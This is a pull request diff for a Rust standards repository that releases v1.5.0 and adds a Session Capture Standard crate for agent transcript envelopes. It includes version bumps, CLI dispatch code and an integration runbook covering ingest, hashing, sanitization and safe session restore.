### PR TITLE
release: v1.5.0 with APS-V1-0004 Session Capture Standard

### DIFF
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -151,20 +151,20 @@ Releases follow the `main` -> `release` branch pattern:
 ### Version Bumps
 
 - **Standards/substandards**: Bump the version in `standard.toml` / `substandard.toml` and `Cargo.toml`
-- **System crates** (`aps-core`, `aps-cli`, `apss`): Bump `[workspace.package].version` in root `Cargo.toml`
+- **System crates** (`apss-core`, `aps-cli`, `apss-bootstrap`): Bump `[workspace.package].version` in root `Cargo.toml`
 - Docs-only changes are exempt from version bumps
 
 For first-time setup, see [`.github/RELEASE_SETUP.md`](.github/RELEASE_SETUP.md).
 
 ## For AI Agents
 
-See [AGENTS.md](AGENTS.md) for the RIPER-5 operational protocol designed for AI coding assistants.
+See [AGENTS.md](AGENTS.md) for the full operating guidance for AI coding assistants working in this repository.
 
 Key points:
-- Always declare your current mode
-- Follow the Research → Innovate → Plan → Execute → Review flow
-- Use `just check` after Execute mode
-- Commit with conventional messages
+- This repo ships two distinct CLI binaries; do not conflate them. `apss` (`crates/apss-bootstrap`, published to crates.io) is the consumer-facing binary (`init`, `install`, `status`, `validate`, `config`, `run <slug> <command>`). `apss-dev` (`crates/aps-cli`, never published) is repo-internal tooling for authoring this repo's own standards, with commands under `v1` (`v1 validate`, `v1 create`, `v1 promote`, `v1 version`, `v1 list`, `v1 generate views`). Never write a bare `aps` command in docs or examples.
+- Run `just check` before finishing, and `just aps-validate` if you touched standards.
+- Commit with conventional messages, and only commit when explicitly asked to.
+- No em dashes anywhere in the repo; use colons or commas instead.
 
 ## Getting Help
 

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -86,7 +86,7 @@ dependencies = [
 
 [[package]]
 name = "aps-cli"
-version = "1.4.0"
+version = "1.5.0"
 dependencies = [
  "apss-core",
  "apss-distribution",
@@ -108,7 +108,7 @@ dependencies = [
 
 [[package]]
 name = "apss"
-version = "1.4.0"
+version = "1.5.0"
 dependencies = [
  "apss-core",
  "clap",
@@ -121,7 +121,7 @@ dependencies = [
 
 [[package]]
 name = "apss-core"
-version = "1.4.0"
+version = "1.5.0"
 dependencies = [
  "handlebars",
  "semver",

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -95,6 +95,7 @@ dependencies = [
  "apss-v1-0001-code-topology",
  "apss-v1-0002-architecture-fitness",
  "apss-v1-0003-documentation",
+ "apss-v1-0004-session-capture",
  "apss-v1-0005-agent-recipe",
  "clap",
  "regex",
@@ -171,7 +172,7 @@ dependencies = [
 
 [[package]]
 name = "apss-v1-0000-meta"
-version = "1.5.1"
+version = "1.5.2"
 dependencies = [
  "apss-core",
  "tempfile",
@@ -259,6 +260,20 @@ dependencies = [
  "thiserror",
  "toml",
  "walkdir",
+]
+
+[[package]]
+name = "apss-v1-0004-session-capture"
+version = "1.0.0"
+dependencies = [
+ "apss-core",
+ "jsonschema",
+ "regex",
+ "serde",
+ "serde_json",
+ "serde_json_canonicalizer",
+ "sha2",
+ "toml",
 ]
 
 [[package]]
@@ -1627,6 +1642,12 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "9774ba4a74de5f7b1c1451ed6cd5285a32eddb5cccb8cc655a4e50009e06477f"
 
 [[package]]
+name = "ryu-js"
+version = "1.0.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "04d056b875a9d2e6cb9a61d127afee9ac5999b9f87bcb32079d1318e505be714"
+
+[[package]]
 name = "same-file"
 version = "1.0.6"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1715,6 +1736,17 @@ dependencies = [
  "serde",
  "serde_core",
  "zmij",
+]
+
+[[package]]
+name = "serde_json_canonicalizer"
+version = "0.3.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "fe52319a927259afbfa5180c5157cd8167edfd3e8c254f9558c7fef44c5649f2"
+dependencies = [
+ "ryu-js",
+ "serde",
+ "serde_json",
 ]
 
 [[package]]

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -13,6 +13,7 @@ members = [
     "standards/v1/APS-V1-0001-code-topology",
     "standards/v1/APS-V1-0002-architecture-fitness",
     "standards/v1/APS-V1-0003-documentation",
+    "standards/v1/APS-V1-0004-session-capture",
     # Experimental standards
     "standards-experimental/v1/EXP-V1-0002-todo-tracker",
     "standards-experimental/v1/EXP-V1-0005-agent-recipe",

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -27,7 +27,7 @@ exclude = [
 ]
 
 [workspace.package]
-version = "1.4.0"
+version = "1.5.0"
 edition = "2024"
 license = "MIT"
 repository = "https://github.com/AgentParadise/agent-paradise-standards-system"

--- a/crates/aps-cli/Cargo.toml
+++ b/crates/aps-cli/Cargo.toml
@@ -18,6 +18,7 @@ code-topology = { package = "apss-v1-0001-code-topology", version = "0.3.0", pat
 architecture-fitness = { package = "apss-v1-0002-architecture-fitness", path = "../../standards/v1/APS-V1-0002-architecture-fitness" }
 documentation = { package = "apss-v1-0003-documentation", version = "0.1.0", path = "../../standards/v1/APS-V1-0003-documentation" }
 agent-recipe = { package = "apss-v1-0005-agent-recipe", version = "0.2.0", path = "../../standards-experimental/v1/EXP-V1-0005-agent-recipe" }
+session-capture = { package = "apss-v1-0004-session-capture", version = "1.0.0", path = "../../standards/v1/APS-V1-0004-session-capture" }
 apss-project-config = { version = "1.0.0", path = "../../standards/v1/APS-V1-0000-meta/substandards/CF01-project-config" }
 apss-distribution = { version = "1.1.0", path = "../../standards/v1/APS-V1-0000-meta/substandards/DI01-distribution" }
 clap.workspace = true

--- a/crates/aps-cli/src/main.rs
+++ b/crates/aps-cli/src/main.rs
@@ -244,6 +244,7 @@ fn main() -> ExitCode {
                 architecture_fitness::register(&mut collector);
                 documentation::register(&mut collector);
                 agent_recipe::register(&mut collector);
+                session_capture::register(&mut collector);
                 for (info, _handler) in collector.entries() {
                     println!("  {} ({}) v{}", info.slug, info.id, info.version);
                     println!("    {}", info.description);
@@ -379,6 +380,7 @@ fn main() -> ExitCode {
                         architecture_fitness::register(&mut collector);
                         documentation::register(&mut collector);
                         agent_recipe::register(&mut collector);
+                        session_capture::register(&mut collector);
 
                         let package_dirs: Vec<std::path::PathBuf> =
                             packages.iter().map(|p| p.path.clone()).collect();
@@ -1020,6 +1022,12 @@ fn resolve_standard(slug: &str) -> Option<StandardCliInfo> {
             name: agent_recipe::NAME,
             version: agent_recipe::VERSION,
         }),
+        "session-capture" | "sessions" | "aps-v1-0004" => Some(StandardCliInfo {
+            id: session_capture::ID,
+            slug: "session-capture",
+            name: session_capture::NAME,
+            version: session_capture::VERSION,
+        }),
         _ => None,
     }
 }
@@ -1034,6 +1042,7 @@ fn dispatch_standard_cli(info: &StandardCliInfo, args: &[String], verbose: bool)
         "architecture-fitness" => dispatch_architecture_fitness(command, cmd_args, verbose),
         "documentation" => dispatch_documentation(command, cmd_args, verbose),
         "agent-recipe" => dispatch_agent_recipe(command, cmd_args),
+        "session-capture" => dispatch_session_capture(command, cmd_args),
         _ => {
             eprintln!("Error: Standard '{}' CLI not implemented", info.slug);
             ExitCode::FAILURE
@@ -1125,6 +1134,19 @@ fn dispatch_agent_recipe(command: &str, args: &[String]) -> ExitCode {
     use apss_core::registry::CommandHandler;
 
     let handler = agent_recipe::cli::AgentRecipeCommandHandler::new();
+    let code = handler.execute(command, args, &toml::Value::Table(Default::default()));
+    ExitCode::from(code as u8)
+}
+
+/// Dispatch session-capture commands through the standard's own command handler.
+///
+/// APS-V1-0004 is definitional, so these commands operate on envelope files
+/// rather than on a project: `validate` checks conformance, `hash` computes the
+/// canonical `content_hash` a store must derive (spec section 4.2.3).
+fn dispatch_session_capture(command: &str, args: &[String]) -> ExitCode {
+    use apss_core::registry::CommandHandler;
+
+    let handler = session_capture::cli::SessionCaptureCommandHandler::new();
     let code = handler.execute(command, args, &toml::Value::Table(Default::default()));
     ExitCode::from(code as u8)
 }

--- a/docs/runbooks/integrate-session-capture.runbook.md
+++ b/docs/runbooks/integrate-session-capture.runbook.md
@@ -1,0 +1,248 @@
+# Runbook: Integrate APS-V1-0004 Session Capture Into a Backend Service
+
+## Purpose
+
+Take a service that already stores agent session transcripts, or one you are
+about to build, and make it conform to the Session Capture Standard by depending
+on the standard's crate instead of hand-rolling the envelope. Written to be
+handed to a coding agent or a developer verbatim: every step has a command or a
+code change and an expected result.
+
+The point of the dependency is not convenience. It is that a divergence from the
+standard becomes a build or test failure rather than a discrepancy someone finds
+months later.
+
+## What you are depending on (read this first)
+
+**There is no trait to implement.** This is the most common wrong assumption, and
+designing around it produces exactly the drift the standard exists to prevent.
+
+The crate ships *concrete* types and functions:
+
+| Item | What it is |
+|---|---|
+| `SessionEnvelope`, `Origin`, `Metadata` | The envelope. Use these types directly; do not define your own. |
+| `envelope.validate()` | Structural conformance for an envelope in flight. |
+| `envelope.validate_stored()` | The above, plus requiring `content_hash`. |
+| `envelope.idempotency_key()` | `(session_id, content_hash)`, `None` while in flight. |
+| `content_hash::parse_ijson(text)` | Parse request bytes under I-JSON rules. **Not optional.** See step 3. |
+| `content_hash_for(&envelope)` | The canonical `content_hash`. |
+| `SESSION_ENVELOPE_SCHEMA` / `session_envelope_schema()` | The embedded JSON Schema. |
+| `reconstitution::Registry` | Per-harness restore knowledge, for resume. |
+| `reconstitution::resolve_within_root()` | Containment-checked path resolution for restore. |
+
+A trait would let you implement a "conforming" envelope of your own shape and
+drift again while still compiling. Shared concrete types make that impossible.
+The standard deliberately leaves storage engine, query language, and API shape
+out of scope (spec section 1.2), so there is nothing a `SessionStore`-style trait
+would usefully constrain.
+
+## Prerequisites
+
+- Rust toolchain and Cargo.
+- The spec open alongside you:
+  [`standards/v1/APS-V1-0004-session-capture/docs/01_spec.md`](../../standards/v1/APS-V1-0004-session-capture/docs/01_spec.md).
+  Section numbers below refer to it.
+
+## 1. Add the dependency
+
+Once the crate is published:
+
+```toml
+[dependencies]
+apss-v1-0004-session-capture = "1.0"
+```
+
+Before it is published, pin the git revision so the build is reproducible:
+
+```toml
+[dependencies]
+apss-v1-0004-session-capture = { git = "https://github.com/AgentParadise/agent-paradise-standards-system", rev = "<commit-sha>" }
+```
+
+The library name is `session_capture`, so imports read
+`use session_capture::SessionEnvelope;`.
+
+**Expected result:** `cargo build` succeeds.
+
+## 2. Delete your envelope types
+
+Find every local definition of a session envelope and remove it, replacing
+references with the crate's types.
+
+```bash
+rg -n "struct SessionEnvelope|SCS_VERSION|scs_version" --type rust
+```
+
+Do not keep a local copy "for convenience" or wrap the crate's type in your own
+struct that re-declares the same fields. Either reintroduces the drift surface.
+A newtype that *contains* `SessionEnvelope` is fine; one that mirrors its fields
+is not.
+
+**Expected result:** exactly one definition of the envelope in your dependency
+graph, and it comes from the crate.
+
+## 3. Fix the ingest path (this is where conformance is won or lost)
+
+Order matters, and two steps are easy to get wrong.
+
+```rust
+use session_capture::{SessionEnvelope, content_hash_for, content_hash::parse_ijson};
+
+// 3a. Parse the ORIGINAL request bytes under I-JSON rules.
+//     This cannot be deferred: a normal JSON parser silently keeps the last of a
+//     duplicate member name, so `{"a":1,"a":2}` and `{"a":2}` become
+//     indistinguishable and would receive the same content_hash. By the time you
+//     hold a serde_json::Value the evidence is gone (spec 4.2.3).
+let value = parse_ijson(&request_body)?;      // reject -> 400 / `rejected` per 5.3
+
+// 3b. Deserialize and validate.
+let envelope: SessionEnvelope = serde_json::from_value(value)?;
+envelope.validate()?;                          // reject -> `rejected` with a reason
+
+// 3c. Compute the hash BEFORE sanitizing, over the captured content.
+//     Never honour a producer-supplied value: overwrite it (spec 4.2.3).
+let hash = content_hash_for(&envelope)?;
+
+// 3d. Dedup on (session_id, hash). Only now sanitize, then persist.
+//     The pre-sanitization bytes are never written to disk (spec 5.4).
+let stored = sanitize(envelope);               // your redaction + NUL strip
+persist(stored, &hash, sanitizer_version)?;
+```
+
+The two failure modes worth naming:
+
+- **Hashing after sanitizing.** This makes your sanitizer ruleset part of session
+  identity, so every secret-detection improvement changes the digest of content
+  that never changed, and re-uploads stop deduplicating. Nothing detects it until
+  your corpus is full of duplicates.
+- **Trusting a producer's `content_hash`.** You cannot know how it was derived.
+  Recompute and overwrite, always.
+
+**Expected result:** a captured envelope round-trips through ingest and
+`validate_stored()` passes on what you read back.
+
+## 4. Accept the batch shape the standard defines
+
+`POST /v1/sessions/batch` takes a wrapper, not a bare array (spec 5.1):
+
+```json
+{ "envelopes": [ /* one or more */ ] }
+```
+
+A bare top-level array MUST be rejected. If your service currently accepts one,
+change the route and the exporter in the same change so nothing is left pointing
+at the old shape. An empty `envelopes` array is also invalid.
+
+**Expected result:** the wrapper is accepted, a bare array returns an error that
+names section 5.1.
+
+## 5. Record the sanitizer version
+
+Store which sanitizer ruleset produced each stored row (spec 5.5). When you later
+improve secret detection you re-sanitize the affected rows; `content_hash` does
+not change, because it describes captured content. Without the recorded version
+you cannot target the migration.
+
+**Expected result:** every stored row carries a sanitizer version.
+
+## 6. Add the conformance test that makes drift a build failure
+
+This is the step that gives the whole exercise its value. A test that runs a
+*real* stored envelope through the standard's own validator:
+
+```rust
+#[test]
+fn stored_envelopes_conform_to_aps_v1_0004() {
+    let envelope: session_capture::SessionEnvelope =
+        serde_json::from_str(&fixture_from_real_corpus()).unwrap();
+    envelope
+        .validate_stored()
+        .expect("stored envelopes must satisfy APS-V1-0004");
+}
+```
+
+Wire it into CI. When the standard tightens a rule in a later minor, your build
+tells you.
+
+**Expected result:** CI fails if your service emits an envelope the standard
+rejects.
+
+## 7. Optional: reconstitution (cross-machine resume)
+
+Only if you want resume. Same-harness only; cross-harness is out of scope.
+
+```rust
+use session_capture::reconstitution::{Registry, resolve_within_root};
+
+let registry = Registry::shipped();
+let entry = registry.entry(&envelope.source_format)?;   // unknown -> fail loudly
+entry.validate_session_id(&envelope.session_id)?;       // untrusted input
+
+// metadata.source_path is untrusted and chooses a WRITE LOCATION.
+let target = resolve_within_root(harness_root, source_path)?;
+```
+
+Non-negotiable, because push producers are untrusted (spec 6.4.5, 10.3):
+
+- Resume descriptors come from the registry, **never** from envelope fields. An
+  envelope-carried command executed on the restoring machine is remote code
+  execution by design.
+- Invoke the resume descriptor as program-plus-args, **without a shell**.
+- Resolve `metadata.source_path` with `resolve_within_root`, never by joining it
+  onto a root yourself. The lexical check alone cannot see symlinks.
+- An unknown `source_format` MUST fail loudly rather than guess a path. Cursor is
+  absent from the registry on purpose: it stores sessions in SQLite, so it is
+  captured and searchable but not reconstitutable.
+
+**Expected result:** capture on machine A, restore on machine B at a different
+local path, and the harness's native resume continues the session.
+
+## Migrating an existing corpus
+
+If you already store envelopes under a pre-ratification shape:
+
+1. **`scs_version`.** Emit `"1.0"`. If existing rows carry another form such as
+   `"scs/1"`, add a tolerant reader and backfill, or the new conformance test
+   goes red against your own corpus on day one.
+2. **`content_hash`.** If you previously hashed post-sanitize, or over a
+   different field set, recompute for the whole corpus using `content_hash_for`.
+   Until you do, old and new rows will not deduplicate against each other.
+3. **`raw` shape.** If a reader parses a line-delimited transcript into an array
+   of objects, it has already forfeited byte-exact resume: re-serializing does
+   not reproduce the original bytes. Capture the file's exact bytes as a JSON
+   string instead (spec 4.3.1). Check this before building anything on resume.
+
+## Verifying without writing code
+
+The standard ships a CLI for checking envelopes and comparing hash
+implementations:
+
+```bash
+apss-dev run session-capture validate path/to/envelope-or-batch.json
+apss-dev run session-capture hash path/to/envelope.json
+```
+
+`hash` prints the canonical digest, so you can diff it against what your service
+computes. A mismatch means your store will not deduplicate against any other
+conformant store, which is otherwise a silent failure.
+
+## Common mistakes
+
+| Mistake | Consequence |
+|---|---|
+| Implementing "the trait" | There isn't one. You have written a parallel envelope that will drift. |
+| Validating after parsing instead of `parse_ijson` on the raw bytes | Duplicate member names go undetected; two different sessions collide on one hash. |
+| Hashing after sanitizing | Sanitizer updates silently break dedup, unrecoverably. |
+| Keeping a local `SessionEnvelope` alongside the crate's | Reintroduces the exact drift the dependency exists to prevent. |
+| Accepting a bare JSON array batch | Non-conformant, and unextendable later without a breaking change. |
+| Joining `metadata.source_path` onto a root by hand | Arbitrary file write from an untrusted envelope. |
+
+## References
+
+- Specification: [`docs/01_spec.md`](../../standards/v1/APS-V1-0004-session-capture/docs/01_spec.md)
+- Overview: [`docs/00_overview.md`](../../standards/v1/APS-V1-0004-session-capture/docs/00_overview.md)
+- JSON Schema: [`schemas/session-envelope.schema.json`](../../standards/v1/APS-V1-0004-session-capture/schemas/session-envelope.schema.json)
+- Reconstitution registry: [`registry/reconstitution.toml`](../../standards/v1/APS-V1-0004-session-capture/registry/reconstitution.toml)
+- Worked examples: [`examples/`](../../standards/v1/APS-V1-0004-session-capture/examples/)
+- Adopting APSS standards generally: [`adopt-apss-standards.runbook.md`](./adopt-apss-standards.runbook.md)

--- a/docs/runbooks/integrate-session-capture.runbook.md
+++ b/docs/runbooks/integrate-session-capture.runbook.md
@@ -25,7 +25,7 @@ The crate ships *concrete* types and functions:
 | `envelope.validate()` | Structural conformance for an envelope in flight. |
 | `envelope.validate_stored()` | The above, plus requiring `content_hash`. |
 | `envelope.idempotency_key()` | `(session_id, content_hash)`, `None` while in flight. |
-| `content_hash::parse_ijson(text)` | Parse request bytes under I-JSON rules. **Not optional.** See step 3. |
+| `content_hash::parse_ijson(text)` | Parse the request body text (`&str`) under I-JSON rules. **Not optional.** See step 3. |
 | `content_hash_for(&envelope)` | The canonical `content_hash`. |
 | `SESSION_ENVELOPE_SCHEMA` / `session_envelope_schema()` | The embedded JSON Schema. |
 | `reconstitution::Registry` | Per-harness restore knowledge, for resume. |
@@ -84,45 +84,109 @@ graph, and it comes from the crate.
 
 ## 3. Fix the ingest path (this is where conformance is won or lost)
 
-Order matters, and two steps are easy to get wrong.
+The normative order, which the code below follows:
+
+1. Authenticate; the token must be scoped `sessions:write` (5.2).
+2. Decode the body as UTF-8 text.
+3. `parse_ijson` on that text, before anything else parses it.
+4. Require a non-empty `{ "envelopes": [...] }` wrapper (5.1).
+5. Per envelope: schema-validate, deserialize, `validate()`, compute the hash
+   *before* sanitizing, dedup, sanitize, **assign the computed hash**, record the
+   sanitizer version, `validate_stored()`, persist.
+6. Return a per-item `accepted` / `duplicate` / `rejected` outcome, with a reason
+   for each rejection (5.3).
 
 ```rust
-use session_capture::{SessionEnvelope, content_hash_for, content_hash::parse_ijson};
+use session_capture::{
+    SessionEnvelope, content_hash_for, content_hash::parse_ijson, session_envelope_schema,
+};
 
-// 3a. Parse the ORIGINAL request bytes under I-JSON rules.
-//     This cannot be deferred: a normal JSON parser silently keeps the last of a
-//     duplicate member name, so `{"a":1,"a":2}` and `{"a":2}` become
-//     indistinguishable and would receive the same content_hash. By the time you
-//     hold a serde_json::Value the evidence is gone (spec 4.2.3).
-let value = parse_ijson(&request_body)?;      // reject -> 400 / `rejected` per 5.3
+// `parse_ijson` takes &str, so decode first and reject invalid UTF-8 explicitly
+// rather than lossily. `body` here is your framework's byte buffer.
+let text = std::str::from_utf8(&body).map_err(|_| reject("body is not valid UTF-8"))?;
 
-// 3b. Deserialize and validate.
-let envelope: SessionEnvelope = serde_json::from_value(value)?;
-envelope.validate()?;                          // reject -> `rejected` with a reason
+// 3a. I-JSON on the ORIGINAL text. This cannot be deferred: a normal JSON parser
+//     silently keeps the last of a duplicate member name, so `{"a":1,"a":2}` and
+//     `{"a":2}` become indistinguishable and would receive the same
+//     content_hash. Once you hold a serde_json::Value the evidence is gone
+//     (spec 4.2.3).
+let body_value = parse_ijson(text).map_err(|e| reject(&e.to_string()))?;
 
-// 3c. Compute the hash BEFORE sanitizing, over the captured content.
-//     Never honour a producer-supplied value: overwrite it (spec 4.2.3).
-let hash = content_hash_for(&envelope)?;
+// 3b. The batch wrapper. A bare array and an empty array are both invalid (5.1).
+let envelopes = body_value
+    .get("envelopes")
+    .and_then(|v| v.as_array())
+    .filter(|a| !a.is_empty())
+    .ok_or_else(|| reject("body must be a non-empty { \"envelopes\": [...] } (5.1)"))?;
 
-// 3d. Dedup on (session_id, hash). Only now sanitize, then persist.
-//     The pre-sanitization bytes are never written to disk (spec 5.4).
-let stored = sanitize(envelope);               // your redaction + NUL strip
-persist(stored, &hash, sanitizer_version)?;
+let validator = jsonschema::validator_for(&session_envelope_schema())?;
+let mut outcomes = Vec::new();
+
+for value in envelopes {
+    // 3c. Schema validation is a store obligation in its own right (6.3.2).
+    if validator.validate(value).is_err() {
+        outcomes.push(Outcome::rejected("does not satisfy the session-envelope schema"));
+        continue;
+    }
+
+    let envelope: SessionEnvelope = match serde_json::from_value(value.clone()) {
+        Ok(e) => e,
+        Err(e) => {
+            outcomes.push(Outcome::rejected(&e.to_string()));
+            continue;
+        }
+    };
+    if let Err(e) = envelope.validate() {
+        outcomes.push(Outcome::rejected(&e.to_string()));
+        continue;
+    }
+
+    // 3d. Hash BEFORE sanitizing, over the captured content. Any value the
+    //     producer sent is ignored by content_hash_for and overwritten below.
+    let hash = match content_hash_for(&envelope) {
+        Ok(h) => h,
+        Err(e) => {
+            outcomes.push(Outcome::rejected(&e.to_string()));
+            continue;
+        }
+    };
+
+    // 3e. Dedup on the computed hash, never a supplied one (5.3).
+    if store.contains(&envelope.session_id, &hash)? {
+        outcomes.push(Outcome::Duplicate);
+        continue;
+    }
+
+    // 3f. Sanitize, then ASSIGN the computed hash. content_hash_for returns a
+    //     String and does not mutate the envelope, so skipping this assignment
+    //     leaves a producer-supplied hash in the stored row.
+    let mut stored = sanitize(envelope);       // your redaction + NUL strip
+    stored.content_hash = Some(hash);
+    stored.validate_stored()?;                 // a stored envelope must carry it
+    store.persist(&stored, sanitizer_version)?;
+    outcomes.push(Outcome::Accepted);
+}
 ```
 
-The two failure modes worth naming:
+Note that each fallible call returns a *different* error type (`ContentHashError`,
+`serde_json::Error`, `ValidationError`). They all implement `std::error::Error`,
+so `?` works under `anyhow` or `Box<dyn Error>`, but a handler with its own error
+type needs `From` impls. The loop above deliberately matches instead of using `?`,
+because 5.3 requires a per-item outcome rather than failing the whole batch.
 
-- **Hashing after sanitizing.** This makes your sanitizer ruleset part of session
+The failure modes worth naming, because none of them surfaces as an error:
+
+- **Hashing after sanitizing.** Makes your sanitizer ruleset part of session
   identity, so every secret-detection improvement changes the digest of content
-  that never changed, and re-uploads stop deduplicating. Nothing detects it until
-  your corpus is full of duplicates.
+  that never changed and re-uploads stop deduplicating.
+- **Computing the hash but not assigning it.** The stored row keeps whatever the
+  producer sent. Dedup then compares against a value you did not derive.
 - **Trusting a producer's `content_hash`.** You cannot know how it was derived.
-  Recompute and overwrite, always.
 
-**Expected result:** a captured envelope round-trips through ingest and
+**Expected result:** a captured envelope round-trips through ingest, and
 `validate_stored()` passes on what you read back.
 
-## 4. Accept the batch shape the standard defines
+## 4. Reject the shapes the standard forbids
 
 `POST /v1/sessions/batch` takes a wrapper, not a bare array (spec 5.1):
 
@@ -130,12 +194,12 @@ The two failure modes worth naming:
 { "envelopes": [ /* one or more */ ] }
 ```
 
-A bare top-level array MUST be rejected. If your service currently accepts one,
+Step 3b already enforces this. If your service currently accepts a bare array,
 change the route and the exporter in the same change so nothing is left pointing
-at the old shape. An empty `envelopes` array is also invalid.
+at the old shape.
 
-**Expected result:** the wrapper is accepted, a bare array returns an error that
-names section 5.1.
+**Expected result:** the wrapper is accepted; a bare array and an empty
+`envelopes` array both return an error naming section 5.1.
 
 ## 5. Record the sanitizer version
 
@@ -206,8 +270,21 @@ If you already store envelopes under a pre-ratification shape:
    `"scs/1"`, add a tolerant reader and backfill, or the new conformance test
    goes red against your own corpus on day one.
 2. **`content_hash`.** If you previously hashed post-sanitize, or over a
-   different field set, recompute for the whole corpus using `content_hash_for`.
-   Until you do, old and new rows will not deduplicate against each other.
+   different field set, every stored digest is wrong under the ratified
+   definition, and old and new rows will not deduplicate against each other.
+
+   **You cannot repair this by re-hashing what you hold.** A conforming store
+   discarded the pre-sanitization bytes (spec 5.4), so running `content_hash_for`
+   over a stored row yields another *post-sanitization* identity, which is
+   exactly what the standard rejects. It would look like a fix and silently
+   entrench the wrong digest.
+
+   The only correct repair is **re-ingestion from the original transcripts**,
+   running them through the step 3 path so the hash is computed over captured
+   content. Where those originals still exist on disk (`~/.claude/projects`,
+   `~/.codex/sessions`), re-running capture is the migration. Where they do not,
+   those rows cannot be brought into conformance: keep them, mark them as
+   legacy-hash, and accept that they will not deduplicate against re-captures.
 3. **`raw` shape.** If a reader parses a line-delimited transcript into an array
    of objects, it has already forfeited byte-exact resume: re-serializing does
    not reproduce the original bytes. Capture the file's exact bytes as a JSON
@@ -216,24 +293,29 @@ If you already store envelopes under a pre-ratification shape:
 ## Verifying without writing code
 
 The standard ships a CLI for checking envelopes and comparing hash
-implementations:
+implementations. Note that `apss-dev` is the APSS repo's own development binary:
+depending on the crate does not install it. Run these from a checkout of this
+repository, or call the library functions directly from a test in your service.
 
 ```bash
-apss-dev run session-capture validate path/to/envelope-or-batch.json
-apss-dev run session-capture hash path/to/envelope.json
+cargo run -p aps-cli --bin apss-dev -- run session-capture validate path/to/envelope-or-batch.json
+cargo run -p aps-cli --bin apss-dev -- run session-capture hash path/to/envelope.json
 ```
 
-`hash` prints the canonical digest, so you can diff it against what your service
-computes. A mismatch means your store will not deduplicate against any other
-conformant store, which is otherwise a silent failure.
+`hash` prints one tab-separated line per envelope, `session_id<TAB>digest`, so
+compare the second field against what your service computes rather than diffing
+the whole line. A mismatch means your store will not deduplicate against any
+other conformant store, which is otherwise a silent failure.
 
 ## Common mistakes
 
 | Mistake | Consequence |
 |---|---|
 | Implementing "the trait" | There isn't one. You have written a parallel envelope that will drift. |
-| Validating after parsing instead of `parse_ijson` on the raw bytes | Duplicate member names go undetected; two different sessions collide on one hash. |
+| Validating after parsing instead of `parse_ijson` on the original text | Duplicate member names go undetected; two different sessions collide on one hash. |
 | Hashing after sanitizing | Sanitizer updates silently break dedup, unrecoverably. |
+| Computing the hash but never assigning it to the stored envelope | The producer's value survives into storage; dedup compares a digest you did not derive. |
+| Re-hashing already-stored rows to "fix" a legacy corpus | Produces another post-sanitization identity. Looks like a fix, entrenches the wrong digest. Re-ingest instead. |
 | Keeping a local `SessionEnvelope` alongside the crate's | Reintroduces the exact drift the dependency exists to prevent. |
 | Accepting a bare JSON array batch | Non-conformant, and unextendable later without a breaking change. |
 | Joining `metadata.source_path` onto a root by hand | Arbitrary file write from an untrusted envelope. |

--- a/standards/v1/APS-V1-0004-session-capture/Cargo.toml
+++ b/standards/v1/APS-V1-0004-session-capture/Cargo.toml
@@ -1,0 +1,26 @@
+[package]
+name = "apss-v1-0004-session-capture"
+version = "1.0.0"
+edition.workspace = true
+license.workspace = true
+repository.workspace = true
+rust-version.workspace = true
+description = "Session Capture Standard: definitional session-envelope types, validation, and the reconstitution registry"
+readme = "README.md"
+keywords = ["sessions", "transcripts", "agents", "standards", "capture"]
+categories = ["development-tools"]
+
+[lib]
+name = "session_capture"
+
+[dependencies]
+apss-core = { workspace = true }
+serde = { workspace = true }
+serde_json = { workspace = true }
+toml = { workspace = true }
+regex = "1"
+sha2 = "0.10"
+serde_json_canonicalizer = "0.3"
+
+[dev-dependencies]
+jsonschema = { workspace = true }

--- a/standards/v1/APS-V1-0004-session-capture/README.md
+++ b/standards/v1/APS-V1-0004-session-capture/README.md
@@ -1,0 +1,80 @@
+# Session Capture Standard
+
+**ID:** `APS-V1-0004`
+**Type:** Official standard
+**Slug:** `session-capture`
+**Version:** `1.0.0`
+**Status:** Active (ratified, promoted from `EXP-V1-0003` on 2026-08-06)
+
+One contract so "back up my agent sessions" works identically across every
+runtime the operator uses (Claude / Codex / Cursor CLIs, a VPS, Docker
+workspaces, syntropic137 workflows), without any of them agreeing on a
+provider's internal transcript shape. Sessions become uniformly backed up,
+searchable, and resumable on a different machine, through a thin envelope that
+wraps each provider's raw transcript verbatim.
+
+## Index
+
+- [standard.toml](standard.toml)
+- [Overview](docs/00_overview.md)
+- [Specification](docs/01_spec.md)
+- [JSON Schema](schemas/session-envelope.schema.json)
+- [Reconstitution registry](registry/reconstitution.toml)
+- [Examples](examples/)
+- [Tests](tests/)
+- [Agent Skills](agents/skills/)
+
+## At a glance
+
+- **Envelope + opaque raw.** A thin, universal envelope carries the fields the
+  store backs up, sorts, dedups, and attributes by; the provider transcript is
+  preserved byte for byte in `raw`. The standard never claims to understand a
+  provider's internals, so it cannot rot as providers churn.
+- **Metadata is first-class for search.** Conformant stores can filter and query
+  sessions by `metadata` fields (repo, origin, agent, model, project, tags),
+  not only full-text over content. Lexical and metadata search is the baseline;
+  semantic and embedding search is explicitly optional.
+- **Three conformance profiles.** Source (pull: read local transcripts into
+  envelopes), Exporter (push: POST envelopes to a batch endpoint with a scoped
+  token), and Reconstitutor (restore: write a stored session back to disk on
+  another machine and resume it natively).
+- **Sanitization is a security floor.** Stores sanitize unconditionally and never
+  persist pre-sanitization bytes. `content_hash` is computed at ingest over the
+  captured content, so a session keeps one stable identity no matter how the
+  sanitizer later evolves.
+- **Resume is a fitness function, not a feature.** Reconstitution turns the
+  "preserve `raw` verbatim" requirement into an executable round-trip test.
+- **Server-derived search.** Normalization for cross-provider search is a
+  server-side, best-effort, swappable concern over `raw`; the client contract
+  commits to nothing provider-specific.
+
+## Scope
+
+This standard is DEFINITIONAL. It specifies the session envelope, the batch
+transport, the three conformance profiles, reconstitution, and the versioning
+rules. The behavioural reference implementation (Source adapters, the exporter,
+the server-side sanitizer and parsers, the Reconstitutor client) lives in the
+SeshMagic repository, not here.
+
+The crate in this package provides the canonical envelope types, their
+validation, and the reconstitution registry. Consumers should depend on it rather
+than reimplement the envelope, so divergence from this standard is a build
+failure rather than an undetected drift.
+
+## Validation
+
+```bash
